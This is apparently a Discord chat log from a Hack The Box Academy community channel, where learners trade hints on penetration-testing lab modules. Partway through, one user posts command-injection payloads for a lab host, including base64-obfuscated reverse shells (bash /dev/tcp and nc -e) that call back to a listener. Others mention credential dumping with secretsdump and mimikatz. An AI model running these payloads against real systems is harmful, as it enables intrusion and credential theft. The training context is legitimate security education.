#modules

If you don't know how to spot a public ip, please refer to basic networking

Have you done this section? https://academy.hackthebox.com/module/227/section/2496 what should i do about the inetsim thing? it warns that the pwnbox is already connected via vpn (and that might cause issues?)

i mean, my vm would be connecting to vpn as well?

The reason they say use your own vm is bc the pwnbox has an external facing interface

Using your own vm allows you to lock down the network access and retain a lot of control

ok so connect my vm and down any external itnerfaces?

does that work after connecting to vpn?

What is mean by external interface is the pwnbox literally has a public ip

im with you there

I haven't done this module so idk what all they have you analyze, but if it's a file, then you don't connect to a target

If there is no 'spawn target' button, there's no target to connect to

ah, ok

For anyone experiencing this same issue it seems that Powershell is interpreting the 1 at the beginning of the IP address as an index. The fix I found was to wrap everything in quotes. Ex. dig ns inlanefreight.htb '@1.1.1.1' You'll probably only be encountering this issue if you're connecting using PWNBOX

Hypothetical: If I've found a command injection vulnerability on a public-facing web app and I'm trying to run a reverse shell command. The reverse shell command should use my public IP address, right? Do I need to port forward the port on which my listener is active?

I'm asking since in all the web modules I've done, the web applications I've compromised are on the local network. So I was just wondering if I understood the concept for how things would work for an external facing web app since I've never pentested against an external facing web app.

Are you doing your testing from within a VM ?

I think you would have to port forward as well yh

That's usually from where I'd do it, so yeah.

Would I not need to port forward if I were running a bare metal attack machine?

I usually only catch stuff with ngrok, and burp collaborator

but i'd imagine you need to configure your firewall and maybe even portforward on your router even ?

Oh, I see, so it's what I expected it to be like. I was just asking since I'm at near the end of the Penetration Tester Job Path and preparing to take the AEN blind.

Its usually all local on the AEN and in the exam

so you dont have to worry about attacking anything on the internet

Oh okay, cuz I was worried since they both said external pentest, so I thought I'd have to port forward on my router. Thanks for the ngrok tip though, hadn't occurred to me to use that for port forwarding instead of going through the trouble of setting the port forward on the router and restarting the router and all that hassle.

tl;dr: use ngrok

How do I do it with ngrok again? I've forgotten 💀

It was Domains and then I gotta start a tunnel, right?

How do you usually do it with ngrok?

read the documentation of ngrok

were you able to figure this out?

You an AQW player? (askin cuz of ur username)

hmm I think I played aq like 14 years ago when i was younger lol

I just like the word tbh 😄

Nice, it is a cool word 😂

Hello !
Looking for the syntax of an answer question for DACL Attacks I. The question - RIGHT_WRITE_OWNER allows modifying what attribute of an object?
The answer must be ||Security Descriptor's Owner||
But it doesnt work

nope. sick

what exactly does it mean by universal attack chain?

ah ok feel better soon. got a bit of a cough myself

hello guys , i'm trying to solve the EvilCUPS box i've followed the ipsec video and i've downloaded the exploit from its github repo then when i want to execute the test print job of the my malicious machine to get a reverse shell i got this error on the cups dashboard "stopped
"Filter failed"" and when i go and see the python code i got this error too "Exception occurred during processing of request from ('10.10.11.40', 48740)
Traceback (most recent call last):
File "/usr/lib/python3.10/socketserver.py", line 683, in processrequestthread
self.finish_request(request, client_address)
File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.10/socketserver.py", line 747, in __init
self.handle()
File "/usr/lib/python3.10/http/server.py", line 425, in handle
self.handle_one_request()
File "/usr/lib/python3.10/http/server.py", line 413, in handle_one_request
method()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 101, in do_POST
self.handle_ipp()
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/server.py", line 140, in handle_ipp
ipp_response = self.server.behaviour.handle_ipp(
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 71, in handle_ipp
return command_function(ipp_request, postscript_file)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 163, in operation_print_job_response
self.handle_postscript(req, psfile)
File "/home/hacker/.local/lib/python3.10/site-packages/ippserver/behaviour.py", line 410, in handle_postscript
raise NotImplementedError
NotImplementedError

target connected, sending payload ..." so please anyone can help me

Is there someone I can DM about File Upload Attacks Skill Assessment? I've been stuck on this for days and I have tried a lot of combinations to no success.

Ddm me

helo help please i stuck here from 3 hours

Submit the contents of the flag.txt file in the /home/srvadm directory.

Attacking Enterprise Networks | Initial Access

bypassed this filter previues theme but in Initial Access i can't I used all methods for bypassing

#boxes

i was not able to join your link

verify your account -> #welcome

i tried to verify it but they told me to join the hack the box server and i'm already in

that's not part of the verification process

do this: #welcome message

there are four steps you need to follow

done i verified my self

Good job 👏

so what to do next ?

#modules message

i go to the boxes channel then i ask my question or what ?

Yes

🆘

Bro I can't reverse shell

||curl 'http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1 'l's${IFS}'|| worked but when i try revese shell always says invalid input

I've had nothing but issues with the tunneling lab machines.

<@&861185840277487616>

ty

Have u tried base64

yes

Then ur messing something up

okay i will try thanks

||curl 'http://monitoring.inlanefreight.local/ping.php?ip= 'e'ch'o'${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNi80NDQ0IDA+JjE='${IFS}|${IFS}base64${IFS}-d'|| | is wrong thing ? or What am I doing wrong?

good evening, can anyone help me with C# module ?

Howdy People, I'm working through the Password Attacks Medium lab. I have the logins for root, jason, and dennis, extracted and cracked the Docs.zip and the docx file, but the hint leads me to believe I need root's id_rsa to login as root. Any hints to get me to that end?

Meterpreter Tunneling & Port Forwarding lab boxes are just dieing on me. I can't get a tunnel to last for more than a single command. @jolly cradle @surreal rain

did you tried the ssh with the creds you found at the docx?

why are you pinging random people

@next bronze

whats up

Guys I m new in this field
I want to learn cyber security and ethical hacking
And I need resources and guidance at free of cost
Pls help me to find resources

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

That’s not how they taught it in command injections

Yep and I get in, but have no access to root. I also searched for databases and ssh keys, checked for any crontabs under jason's account

It’s just unstable

I think meterpreter might be the worst way tbh

yeah I guess I'm just trying to recreate what the module has you do. I ended up just running the ping sweep manually

Please do not randomly ping people for help.

You call back is likely being killed by AV

Hey, is it possible you can help explaining this?

The payloads in the red field are responding with “Only images are allowed” which means that these are likely filtered by the whitelist.

The rest are responding with “This extension is not allowed” meaning that these extensions are probably blacklisted.

So essentially, by now I should've figured out which extensions are blacklisted and I "only" need to figure out how to bypass the whitelist filtering.

I tried replicating your steps using the Character Injection Bash script to make a extension list with .phtml .phar .pgif. The only thing I see that I might've done differently is using jpg for the bash script and not png but I don't see why that would make a difference since both are whitelisted?

I would assume it’s the content type that’s causing that

@rustic sage - Try changing to a different payload and/or setting a different EXIT FUNC on your payload. Could be killed by AV. Also in the future, if you want potentially faster responses, don't ping 2 admins of the community. Ask the community without pinging anyone and be patient.

@surreal rain Thanks for the help. I'll try that

?

but this also not worked :|| curl 'http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1 'b'ash<<<$(base64%09-d<<<bmMgMTAuMTAuMTYuMTYgNDQ0NCAtZSAvYmluL2Jhc2gK)'||

Hi. I've been stuck on the "Active Directory enumeration & Attacks" module. I am currently stuck at the last question of submodule " Domain Trust , Child Domain --> Parent Domain" or something like that. I can't figure out how can I extract the Nt hash of the given User B. I have completed all steps of ExtraSids and compromised the DC.

I try to upload binaries of popular tools, but the output is not showing( or showing as a stdout

check the .ssh folder, crack the password and try to log in with another account

didnt do that module yet but did you try mimikatz

I tried to to upload its binaries via cURL. But its only showing in stdout. and man the terminal is sick

can't do backspace, nothing

evil-winrm?

Hi am completing a module windows defender evasion
In static section it show
Ok - undetected by Microsoft Defender
But not giving flag.txt
If anyone completed this plz guide

try getting a meterpreter

There's no .ssh folder for jason or dennis and I can't access root's directory?

dennis should have a .ssh

imagine not doing ls -la

You are correct, I missed that, but jason has no permission to access anything in dennis. I'll keep wrestling with it, thank you for your help!

check for services running locally, you will find something that you can access

Meterpreter is out of question. But though I did it through golden tickets and dont have Hard credentials for the DC. the golden ticket is stored as FILE

Okay, I'll keep digging

so I didnt find relevant flags for kerberos tickets( or i didn't get it)

Oh I read that wrong, not sure what the reply was

bro deleted it 😭

Yeah idk what is up @shut quest why did you delete

can you try making responder listening on your machine

sql incection assessment:https://academy.hackthebox.com/module/33/section/518
could write to a directory but dont know where to access it? How to find out?

and try to steal the ntlmv2 hash

im not really good in AD so idk

what is the problem at the ad one? I didn't found the question

I can't upload any binaries in that session

here it is

in your attacker machine

i will check

maybe upload the file to a location you can access

think where web servers tend to be located on a linux based machine

given that you have DA on the target domain, just dcsync or extract from ntds

"Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer." ?

yeah you can do what Xre said, impacket-secretsdump from your linux machine

this is the question

instead of psexec you can use secretsdump -just-dc flag

even using xp_cmdshell to reverse its not works

please refrain from spoiling the AEN module

also you don't need to use the sql service to do anything

you'll need to use the built-in file manager

lets try that also

let me know if you got it

i also highly suggest finishing out AEN blind, not reading the questions or following any guides/module

the rest of what's in AEN is nothing you haven't encountered in some form before

just gotta enumerate; enumerate; enumerate

I do it blind and when I block I help myself a little ... but yes not so simple ...

pretty much everything on AEN is what's been covered by the course

didn't say it would be simple, but it is stuff you should know

don't look for any hints or nudges forward, gotta learn to unblock yourself -- treat it as the exam

IT WORKED

THANKS MAN

i didnt think of running the help of secretdump. it accepts the same flags as psexec

well I know that you have to make a reverse shell from the but when I saw xp_cmdshell plus the priv allows by the user I understood directly which tools should be used, but only errors ...

you're putting the cart before the horse

nice

gotta figure out how to upload files first

I understand your reason well I’ll take a break and come back on it

i suggest googling the web framework in use and "how to upload files in <Web Framework> app"

thx 🙂

I know you can get through this; and don't be afraid to take several hours to figure it out

it's easy to want to reach for the instant gratification of "what do I do next"

but putting in the time and effort to research what you've run into helps develop a mindset

ta really says it’s real I’m in a hurry to switch to reverse shell instead of seeing the easiest thing

but I was able to unblock myself thanks a day to look in the void x)

not to mention how you're connected to it plays a role

document root & log is not writable --> permission issues - the only one which works is tmp but not accessable
may i have to fuzz directories?

nope

you're thinking too smart

think dumber

where are web server files located on linux

aka the webroot

does anyone know how to launch a .sh file on windows?

you install bash on windows

but fr why do you need to launch a .sh file on windows??

what academy module is this related to?

can I run it from visual too or not?

oml

why do you need to run a .sh on windows

.sh is a bash file, generally gonna be linux

windows executables are .exe

normally I was supposed to run it on vmware but I'm too lazy to install it and reconfigure everything

well that's a skill issue then

¯_(ツ)_/¯

also you weren't "supposed to run it on vmware"

you're supposed to run it on a vm

:)

Oh yes ? because i use vmware to go to fedora and do my things on it

yes but you're not running it on vmware

you're running it on a vm

:) learn the difference

webrott= /var/www/html - cant think of another one

correct

ah yes yes, but I specifically want to do it on vmware

but its not writable

we're just dicing tomatoes at this point

should be

but it isnt

permission issues

or maybe try writing to the folder you're in :)

I prefer potatoes

does most pentest end with DC compromise? or is it just a sweat dream?

it depends

on?

The scope

Some scopes may include multiple forests

i mean is it that possible?

in which case you'd need to compromise the Enterprise Admin account

even sweater

but it all just boils down to; it depends -- if you couldn't compromise everything fully to DA then you just note what you could for the company to fix up or ignore

¯_(ツ)_/¯

like a pentest is about discovering and reporting vulnerabilities in a network not just getting DA, DA is just a bonus

I mean sure, but like as on average, do people get DA that much?

IT DEPENDS

lol

there's a lot of factors that play into it

most companies that get a pentest done have some level of security maturity that would at least make it difficult

but not wholly impossible to reach DA

plenty of vulnerable things within Windows or installed apps that make it easy to privesc

but if a company has done their due diligence in locking down accounts, preventing NT;LM use, etc. it is gonna be harder

solve it?

it also depends on the timeframe scope

Ok
thanks!

There are 2 ways to finish it

Can i send you a DM?

Sure

Check dm

I didn't delete anything not sure what is being referred to.

If anything mod/staff deleted what I said, not sure as to why, I try to keep things in the spirit of the academy.

Hi

anyone who has done Pass the Hash can help me ? Really stuck on "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?" I must be dumb

Like I did use mimikatz to extract the hash of current session, also did it plenty of others ways

You can DM me. Include the section that you are in and the steps you have taken so far

I am going to sleep now. If someone else hasn't helped you by tomorrow feel free to DM then I will get to it when possible.

https://academy.hackthebox.com/module/77/section/843

When I try to run gobuster to enumerate directories it gives me an error "context deadline exceeded (Client.Timeout exceeded while awaiting headers)"

Why am I getting this error?

still on this?

Is HTB staff AFK?

why are u running gobuster on that

i dont think staff is module support 😭

Why not? I was chatting with an HTB founder earlier in here

g0blin was in the chat couple weeks ago

now I'm running nmap and I get "failed to resolve [target IP address]"

Why?

you dont need any of those tools for this

Why not? The section in this module starts with "Once we identify the services running on ports identified from our Nmap scan, the first step is to look if any of the applications/services have any public exploits. Public exploits can be found for web applications and other applications running on open ports, like SSH or ftp."

Need to know what kind of services are running to find exploits for them..

those sections have different machines

I booted up the target machine for this section of the module

is the Citrix Breakout module any less painful if I use the pwnbox?

possibly but still gonna be laggy regardless

RIP

The question at the end of the section " Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)"

In order to do that I need the nmap scan to work..

Said "No targets were specified"

if they give you a target with a port attached to it they want you to use that port

Yes, I left the port at the end of the IP address

Did sudo nmap 83.136.254.47:51866

Got error Failed to resolve [IP address...]
WARNING: No targets were specified

u didnt specify the port with -p

Go do some research on how to scan a specific port with nmap

they just want you to to open the ip on ur browser

also look at your hint

A previous section explained it but that was a few days ago and had already forgot that nmap needs tack p and won't recognize colon with port

File Inclusion
Skills Assessment - File Inclusion

I found the hidden page but after ||uploading a shell no commands|| seems to work I see nothing in the response on the page ||access.log|| page

Ok I don't know what was the issue but after reseting the box it worked

https://academy.hackthebox.com/module/77/section/726

Now I'm waiting on nmap to finish. The app is hanging and won't print anything

Did sudo nmap -sV -sC 83.136.254.47

Just sits there with "Starting Nmap 7.94SVN..."
Is there too much traffic on HTB?

you wont find the answer with nmap

i doubt that scan would find the port too

thats a different section?

the ip should be 10.129.x.x for that

OK it finally spit out a bunch of info. Why wouldn't I need to run nmap to find out what services are running so I can search for exploits for the apps and versions running for metasploit?

the question says "(note: the web server may take a few seconds to start)"

I now know that OpenSSH 9.2p1 is running

meaning the web server is on the port attached to the target

running nmap with the target web server and port specified all I get back is "Port 51866/tcp is closed with unknown service"

with nmap scanning the entire IP address no port specified, I find that 22/tcp is open and running OpenSSH 9.2p1

you just scanning for extra practice or what? 🤨

What can I do with a closed port with unknown service and unknown version #?

its a webserver.

open it on ur browser

thats all the question wants you to do

OK wow I just realized I was scanning an old target SMH

TLattice is right, you know it’s a web server. The hint even mentioned plugins. Just open the link and see what is running. Plug-ins make me think cms

Nmap would be needed if you had no information and didn’t know it was a web server. But in this case you know it is.

Just want to confirm for the Windows PrivEsc Interacting with Users section, is there a particular directory in the ||FS01|| share I'm supposed to create my file in? I've been waiting almost 10mins and no hits (other than my own user after creating the file).

the lnk file?

SCF file but yeh

yeah you can somewhere in there

check all the ones you can write to

yeh so I've put it in there & it "works" but it's only hitting my htb-student account, nothing else hits it

Hello! I am working on 'Lateral Movement' in Attacking Enterprise Networks module and trying to proxychains nmap 3389 on 172.16.8.20 but it says its filtered. It should be open for RDP? Is there something wrong with the VM or I am not doing it right?

as well as every possible sub-directory that's in the share I mentioned above - is there a different one I'm not seeing?

try sudo

lemme check

thanks TL appreciate it

might also try restarting the box just in case 🤷

with sudo it says its closed

did you use the -sT flag also

sudo proxychains nmap -sT -p 3389 172.16.8.20
sudo proxychains nmap -sT -p 3389 172.16.8.20 -Pn
both of these

ah interesting resetting the box didn't clear my file from it either haha

the target? it didn't reset then

I think I just figured it out

was putting it in the wrong share -.-

yeah just got it

the other ports are fine?

No, nothing gets scanned. Seems like I have to do all over again previous stuff from Internal Testing, to be able to continue

what are you using to pivot with

sudo ssh -D 8081 -i dmz01_key root@10.129.51.180
was just trying to do nmap on that 172 machine and then RDP since I have password.

Did it work after setting it up again?

sudo proxychains nmap -sT -p3389 172.16.8.20 -Pn
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-22 20:39 CDT
[proxychains] Strict chain ... 127.0.0.1:8081 ... 127.0.0.1:8081 ... 172.16.8.20:3389 <--socket error or timeout!
Nmap scan report for 172.16.8.20
Host is up (15s latency).

PORT STATE SERVICE
3389/tcp closed ms-wbt-server

Not sure tbh, try with sshuttle and see if that make a difference

Might just need a restart

Could be worth trying while you are connecting to a vpn on your main box. A lot of my commands stopped working without vpn because my ISP flagged me

Or see if it works in pwnbox.

how do i solve this problem i cant able to acces web browsers on instance i tried restating

if you have free pwnbox, your internet access is limited

why i can use it before but from few days I can't able to use it from few days is it a new update

Yeah something is wrong with Pwnbox. Just tried doing it on my own Vm and have no problems with rdping or proxy nmap

Did everyone else experience near persistent instability with lab boxes in the Pivoting/Tunneling module? I'm using Pwnbox to rule out my own stuff and can't RDP into boxes either at all, or with near immediate disconnects. I then have to spam retry a connection and hope I get lucky.

cme is not running on pwnbox

command not found

i tried installing it still has issues

Use netexec

i need to use user.list and pass.list

im attacking winrm

Netexec not installed?

are you just typing cme? the command is crackmapexec

i typed

both

yea it is

Netexec is nearly a 1 for 1 command wise for cme

ok i got it to run

but whats the difference between and why cme not there

Because cme is no longer active, and the people that were active forked the repo into nxe

ohhh ok alright

thanks

Faced this previously as well for the modules where there was need to RDP

bro i used winrm for the skill assessment 😭

i thought rdp was closed cause it just never worked

Hi,

Module: Attacking Common Applications
Section: Exploiting Web Vulnerabilities in Thick-Client Applications
Section link: https://academy.hackthebox.com/module/113/section/2164

I have managed to update the ClientGuiTest.java file, compile it, create a new jar file. Now when I go to FileBrowser > Configs, I see new files. However, when I enter fatty-server.jar as filename, it doesn't get downloaded as described in the section. Instead it just gets displayed. Why is it not being downloaded?

Got it, I also need to modify invoker.java to download the file!

i am on medium lab in footprinting section and i am stuck at mssql server i am connected to the target with rdp and run sql server manager there is a databases but i cant figure it out which table or which database to focus on

?

Hi Guys, I'm having trouble installing the wenum in Web Fuzzing module. Above is the screenshot. Is there any other way to install it?

I'm using this command : pipx install git+https://github.com/WebFuzzForge/wenum like it shown on the Web Fuzzing module.

you could assume which db to check by rereading the question

look through the questio, it gives you a clue on which db to look into 😉

Port?

It just says find the password of user HTB

wenum is already installed for me

on pwnbox

what db would hold usernames

Users tables maybe

how to check the version of wenum? wenum --version?

I found the db but i dont understande how to print those i mean there is select query but when i give absolute path tk that table it gives invalid object and if i give just the name of the table again the same error

wenum --help

i think ffuf would work better tbh

i just looked around when i did it, but there should be

Yep, tried with sudo install ffuf 😋

Even the gobuster got install only with sudo install, not with the command given in the module.

I'm going a little wonky trying to remember what i did a week ago in previous modules. I don't remember much about XSS attacks

I mean the notes help me remember but then ill forget again

thats what the notes are for

if you want to solidify the concept without notes then you need to repeatedly do xss

Hey, need some help with Footprinting Lab - Hard
I've found the next ports ||TCP: 22,110,143,993,995; UDP:161|| but have no idea where to go from now...
I mean my next thought would be to brute force each service but doesn't this is the intended way of solving the problem

well you have an ssh service, a pop3 service and an IMAP service with their SSL counterparts.

Yeah, but all of the services need some sort of authentication

Well the instructions give you a username, HTB

That's right

I mean, should I try bruteforce each service? because it doesnt fit right in my mind

hmmm.... i can't recall, does crackmapexec have an imap option

oh no wait you're not up to that yet.

what about snmp?

We didnt really talk about brute forcing yet.. this is why its a bit weird to me

it uses snmpv3 which doesn't use community strings(from what i understood)

use snmpwalk on it anyway

i've

and found nothing

or onesixtyone

?

onesixtyone is for bruteforcing community strings only i think

i think snmpwalk is the right answer but i should get a user list

right, then you use braa to brute force the individual OIDs and enumerate the info in them

then try it

yeah i remebver talking abour braa

well, thanks, ill try

One tool gets the string, another tool actually reads the OID

[<string>] is part of the output

In the "File Upload Attacks" module section "Whitelist Filters" how on earth does that work? I found the right extension by following the tutorial but how would that extension ever get executed by the php interpreter?

hehehhe yeah what we said was on the right track.

It has been my mistake, its not snmpv3 which means i can run onesixtyone
Ugh i feel stupid because I waisted on it so much time

But how is it that NMAP shows that the service is running SNMPv3?

I don't remember how i did it exactly, i think i used intruder but the way i did it was running a command with the uploaded file to try and get an output

Yeah I figured out how to solve it. But I feel like that answer basically means someone setup Apache to send an extension very not php related to php in a way that would have to be really deliberate

onesixtyone works with it, snmpwalk I think does as well, but in the module the example uses 2c

Whitelist was a very hard portion of file uploads for me, I was equally frustrated by it

the whole point of snmpv3 that its more complex, and using user name, password and i think preshared-key

beginner here, Im on the active directory basics, managing users in AD. It asks that I RDP into Phillips account to prompt Sophie to change her password. When i go to RDP its asking for a computer name, however, the credentials given only give a username and password. ( no computer name) what am i doing wrong here?

The version is actually 2c
Its really weird

i see v2 in the braa output

I mean i never setup snmp on a network so i don't know too much about this

you don't rdp into an account, you rdp to a machine using an account.

got ya, but without a machine name doesnt that become an issue?

you just need an ip address

of the machine

The target machine should be in green on the section page.

Nmap isn't always accurate

40 mins of vpn hopping to get AEN spawned 💀

in the web attack modul, burp look like in the screenshot below, but my burp does not have the response at the right side, is this different in new versions or can i configure this?

that's in repeater, you're probably looking at proxy

alright, yes this is the case

So with snmp, how can I make sure which version I'm using?
Because there is nothing that states this situation in the module?

Just try what's taught

Or use the --script banner in nmap to be sure

Either way always try what's taught first

I mean that's what I did
Information was still unaccurate..
I guess its part of the game

Don't worry about the situation

Assume what's being given to you is similar to what's taught

Hey im trying to solve the first one in the forensics category and i dont seem to be close no matter how i tried can anyone help me

Web Attack / Chaining IDOR Vulnerabilities
i've changed the email as requested, but i dont get how i receive the flag now?

@drifting grail could you please check your inbox. I 've sent an dm.

I think u need to fuzz the profile in burp and find an admin

i have found the admin and changed the email

🍪

Go back to the admin panel where it says about me or something and the flag should be there

In Intro to Assembly Language/Registers, Address and Data types. can you guys please help me to understand this "The big-endian processors would store these bytes as 00000001 10101010 left-to-right," How the 00000001 (least byte) was stored in left ? because the author specified "while with Big-Endian processors, the big-end byte is filled/retrieved first left-to-right." since the big-end byte should be stored first from left to right so the 10101010 should be on the left and 00000001 which results in 10101010 00000001 ?

chatgpt is pretty good in explaining assembly

yeah, My first ask is to that but it also confusing me up more and switching answers if i continue to prompt it differently.

But in the Module:

That's why i thought its appropriate to ask in the module channel instead of trusting on chatgpt completely.

yes so the big endian stores the most significant byte first and the little endian the least significant byte first. the most sinificant byte is so to say the biggest value of the number....

for example the number: 1234
big endian stores: 12 and then 34
little endian stores: 34 and then 12

this is my understanding

okay but in the modules section, it was mentioned as the big bytes stores from left to right.

yes...isnt that what i also explained with the example...? for me it is a match...

0000000110101010 = 426
big endian = 426
little endian = 624 (only an analogy)

what is your goto documentation, do you summerize every page on every module? or only write key commands on each section?

@timber hatch the thing I confused about was as you can read in here, it was mentioned as the big end byte will be stores from left to right and so upon the given example, it was mentioned as 00000001 10101010 was correct but as the 10101010 byte was the big end byte and the 00000001 is the least end byte. if we store the big end byte at left then the least end byte in the right (left- right) we should get 10101010 00000001 as the answer right?

ah, no 00000001 is the big part

maybe you should look first how binary works...

in the big endian example you mentioned, if we consider store the big end byte from left to right then we should get 34 and then 12 since the 34 is larger than the 12 so it should be stored first in the left side

isn't it results in 1?

no the number i meant like one thousand two hundred thirty-four
and then 1 is the biggest because it is the tousand

this are two bits

I am genuinely confused, in the module it was mentioned as it will be store/retrieve byte by byte, by comparing which byte is smaller or larger according to the endian.

2 bits are 1 byte

*8 bits

yes

sorry

fk sorry, I just specified the bit by bit as byte by byte.

Sorry for the confusion, In the module it was specified as it will store the binary values bit by bit, by comparing which bit is smaller or larger according to the endian. I mean on the example.

it stores byte by byte and one byte is = 00000001 and the other is = 10101010
1 byte = 8 bits
no we have it right?

yeah, I knew this.

hey uh i joined the vpn via openvpn and i want to ping my target but that doesnt work :d idk

can i dm you please? for the clarification, if you don't mind?

yes

thanks, now it worked

is your openvpn from previously or did u just download a new configuration file?

downloaded new file and also tried the old file

what lab/module were you tring to access?

all good the problem is solved :d thanks for answering tho

dw. nice name btw lol

Somehow htb academy don't shows me hints any fix ?

Hey guys, please note that to use ffuf on Pwnbox you will have to install it using sudo apt insatll ffuf and that crackmapexec is now netexec

Not all tasks include hints

I mean I click on the yellow hint button and nothing is happening

the site somehow getting bigger but no hint message

deactivate all AdBlockers and then try again

Any change in wenum installation? I'm having trouble in installing it.

This is a dumb question but in the module Windows Attacks & Defense they ask me to use the file passwords.txt to crack the hashes but it says there's no file in the directory. Here are my questions.

Where is the file on the machine given?
Is there a way to make my machine scan without a complete file path?

Yeah I either did that or just stole the flag from the solution. It wasn't worth losing anymore time

can you link the section i think i've done this one

Hello guys im on the file uploads module on the skill assesment section, i was able to read the source code of upload.php and find the directory where is storing my file and the file name scheme but im still getting a 404 not found

Hey guys i need a hint for the Skills Assessment - SQL Injection Fundamentals.
I dont want to lookup the write up because i want to learn after all, but i am stuck. I cant even get anything out with the injection techniques that are in the lessons.

try some different extensions
even flip them

oh actually, make sure if you really know the naming scheme

https://academy.hackthebox.com/module/176/section/1779

Can i dm you?

sure

where did you stuck?
explain your ongoing progress

O hold on i might have gotten myself unstuck 🙂

All done it was pretty easy actually. I just got a bit stuck in the begining

hey yall have a lil problem on footprinting module - > lab medium

found creds on smb share for mssql but cant login with it ?

Try another user or password

mind if I dm ya

sure, you can send me a dm

Does anyone know why this command for this question doesn't work? It's at Linux Fundmanetals / Find Files and Directories

any one else currently on information security?

try putting your find command inside ls -la

ls -la $(find / -type etc...)

Nothing happens

remove the -exec ls -la ...

A few hundred lines of text like this

you forgot the 2>/dev/null at the end

your last command you used type instead of find. it's also missing the directory to search /

ahahahahaha

always kills me people who wants to hack their ex gf insta

Im a girl mate

lool

And its not abt tht

sorry its really not the place to

Idk whats the fkn place 😭 am new here how do u Evennn use this app

Like what server do i even

💔💔

Bruh i forgot i terminated ssh

Hack you ex bf then

(Maybe)❤️

Ok fr though

Someone, please help me with que onda. I tried spawning the instance but it doesn't even work😭

Hiii!! This is a discord server for a CTF (Capture The Flag) Challenge.

No someone help me instead HHAHAHA

OH

Yes

🤠

Thx for the help pookie

Your'e welcome

Anything we can help you with ?

#1297865236409483378

https://forum.hackthebox.com/t/kerberos-attacks-skills-assessment/303926/8
How do I connect to ||SERVERxx ||machine from inside the ssh instance?

Greetings all. I'm working through the CPTS "Documentation & Reporting Practice Lab" and have rearranged all of the notes to get some orientation. I've found the LFI and would like to exploit it for (I assume) the command injection but none of the attacks in the notes seem to work. I'm obviously missing something and have looked HTB forum posts and searched Discord for hints. I assume next step is to somehow read the index.php file for config using encoding but am a bit stuck. Any pointers here pls?

Ah, think I may just have solved it. Seems it's pretty basic and was staring me right in the face in the "command injection" module.

HTB is using <img src tag on their pages

so try starting with " as your starting character

Hey thanks a lot. I actually figured it out and completed the skill assessment.

I never figured it out on my own

i kept writing payloads without the "

I am not sure we are talking about the same thing. the <img src tag wasnt involved in the method i used

Sql injection: Assessment --> could read the flag through a webshell
Im wondering if it is also possible to establish a reverse shell out of a webshell at this specific task?

i have a problem submitting the right answer at this module Detecting Windows Attacks with Splunk with section Detecting Pass-the-Hash

hey i am at Footprinting Lab - Hard andI guessed the cred for SNMP , is there another way to get it?

how did you guess the creds for snmp

actually you could try to bruteforce community strings

and you would get the same answer

I mean you can use the tool referred to in the module

ok thx

good question. I havent tried.

One day soon I will be hackerman

has anyone recently had any luck with the Linux Privelege Escalation - Logrotate section?

I haven't been able to get it to work, even with simple payloads that just create a file on the target system

https://tenor.com/view/hacker-typing-hacking-computer-codes-gif-17417874

got it

simply wasn't working

had to keep trying

race condition moment

not a great demo for a learning module

module: linux privilege escalation
section: linux services and internal enumeration

I'm having trouble finding the latest python version I put in like four different versions and used various commands

use the number only

the flag format is unclear for that one

Thank you 🙏

that did it

no problem

Hi guys, I need help with the last question:

"Connect to the WiFi network and submit the flag found at IP 192.168.2.1."

I can't connect even after following the steps, I even tried changing my MAC address. Any clues?

Hi guys, I'm asking for help, I'm running a lab on HTB, using the web-delivery metasploit module, for some reason it gives this error

Srvhost should be your own ip

Hello, i have a question, am i supposed to browse answers for htb academy questions? Im at the module 18 of the linux learning path, on the filter contents section, and there are some weird questions that i think the average reader wouldn't know, like "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)", i got no idea on how to discover the answer because no tools were mentioned to find out how to discover the services etc

Google search…. If you want it easy, ChatGPT

wait this maybe gave too much info what I wrote so I deleted it my tipp is use netstat with -tuln flags

I guess it would be better to have answerable questions from only the stuff you read

as far as i know, Linux Fundamentals is the only module that requires you to do a lot of your own research to answer the questions

Damn, but i learned a lot of stuff from it

i switched to linux mint on my actual desktop

it helps alot

Imo most of the tools you'll use are given in like the first page or two of that module

It's a list of tools with a brief description

I think there are some in the cheat sheet

i never check that, should prob check it more

Reading the content is generally useful

And no, I wasn't referring to the cheat sheet

read the sections, also read the friendly manual

wdym friendly manual

man <tool>?

man

Yup

You can even google "man <tool>" and find an online man page lol

pretty helpful

with these tips i should be able to actually pass these questions

and googling too

if you're using tmux, split the pane and have the man page open in one pane

tmux is like multiple terminals?

terminal multiplexor

tmux is a terminal emulator that allows you to split panes and things like that

so it helps with openvpn

https://github.com/tmux/tmux/wiki

openvpn is annoying because it makes 1 terminal unusable

until you terminate the process

i have a window dedicated to openvpn

thanks

i will check that out

Yeah i actually have it running on its own workspace

yall dont close it?

how do you do that

closing it kills the connection

no it doesnt

might depend on the terminal im guessing

if i bg it i forget about it

i just click the x on kali and it runs in the backgrond

on mint

try it out 🤷‍♂️ dont know how it would work with that terminal

lemme see on kali

true

on kali it doesnt do any warning

hello

If it helps to see -- I keep a utilities tab open for vpn, smb share, webserver and my initial nmap output . I got into the habit of ctrl + shift +d to split terminals quickly

hey guys im on the Pivoting, Tunneling, and Port Forwarding module and have a problem with the chisel section, after clonning the chisel tool + launching the go build command, after transfering the chisel to the pivot host i can't launch the server i get this error

